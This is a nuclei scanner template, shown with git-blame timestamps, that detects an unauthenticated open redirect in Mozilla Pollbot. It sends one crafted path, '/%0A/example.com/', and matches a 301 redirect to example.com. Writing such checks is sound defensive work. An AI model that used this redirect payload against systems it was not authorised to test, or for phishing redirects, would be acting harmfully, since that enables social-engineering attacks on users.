nuclei-templates/vulnerabilities/other/pollbot-redirect.yaml

27 lines
804 B
YAML
Raw Normal View History

2022-02-18 15:39:04 +00:00
id: pollbot-redirect
info:
name: Mozilla Pollbot Services - Unauthenticated Open Redirect
author: Evan Rubinstien
severity: medium
2022-02-22 06:18:32 +00:00
description: Mozilla has a medium severity open redirect vulnerability in pollbot that could be used for social engineering attaks.
2022-02-22 06:31:20 +00:00
reference:
- https://bugzilla.mozilla.org/show_bug.cgi?id=1753838
- https://github.com/mozilla/PollBot
tags: redirect,mozilla,pollbot
2022-02-22 06:18:32 +00:00
2022-02-18 15:39:04 +00:00
requests:
- method: GET
path:
2022-02-22 06:31:20 +00:00
- '{{BaseURL}}/%0A/example.com/'
2022-02-22 06:18:32 +00:00
2022-02-18 15:39:04 +00:00
matchers-condition: and
matchers:
2022-02-22 06:18:32 +00:00
- type: regex
2022-02-18 15:39:04 +00:00
part: header
2022-02-22 06:18:32 +00:00
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
2022-02-18 15:39:04 +00:00
- type: status
status:
- 301